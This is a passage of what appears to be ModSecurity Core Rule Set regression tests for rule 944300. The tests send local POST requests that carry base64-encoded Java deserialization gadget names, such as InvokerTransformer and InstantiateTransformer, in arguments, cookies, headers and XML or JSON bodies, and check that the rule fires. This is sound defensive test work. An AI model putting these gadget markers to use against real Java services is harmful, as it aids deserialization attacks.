+ output: + log_contains: "id \"944300\"" + - test_title: 944300-191 + desc: "Request header test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-192 + desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" 
+ port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-193 + desc: "XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-194 + desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-195 + desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-196 + desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-197 + desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-198 + desc: "Argument test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-199 + desc: "Argument name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-200 + desc: "Cookie test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-201 + desc: "Cookie name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW52b2tlcnRyYW5zZm9ybWVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-202 + desc: "Request header test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-203 + desc: "XML attribute value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-204 + desc: "XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-205 + desc: "Nested XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-206 + desc: "Content-Type text/plain includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-207 + desc: "Content-Type application/json arg value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-208 + desc: "Content-Type application/json arg name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-209 + desc: "Argument test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-210 + desc: "Argument name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-211 + desc: "Cookie test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-212 + desc: "Cookie name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gludm9rZXJ0cmFuc2Zvcm1lcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-213 + desc: "Request header test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-214 + desc: "XML attribute value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-215 + desc: "XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-216 + desc: "Nested XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: 
"Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-217 + desc: "Content-Type text/plain includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-218 + desc: "Content-Type application/json arg value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-219 + desc: "Content-Type application/json arg name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id 
\"944300\"" + - test_title: 944300-220 + desc: "Argument test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-221 + desc: "Argument name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-222 + desc: "Cookie test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-223 + desc: "Cookie name 
includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnZva2VydHJhbnNmb3JtZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-224 + desc: "Request header test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-225 + desc: "XML attribute value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-226 + desc: "XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + 
input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-227 + desc: "Nested XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-228 + desc: "Content-Type text/plain includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-229 + desc: "Content-Type application/json arg value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 
Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-230 + desc: "Content-Type application/json arg name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-231 + desc: "Argument test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-232 + desc: "Argument name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
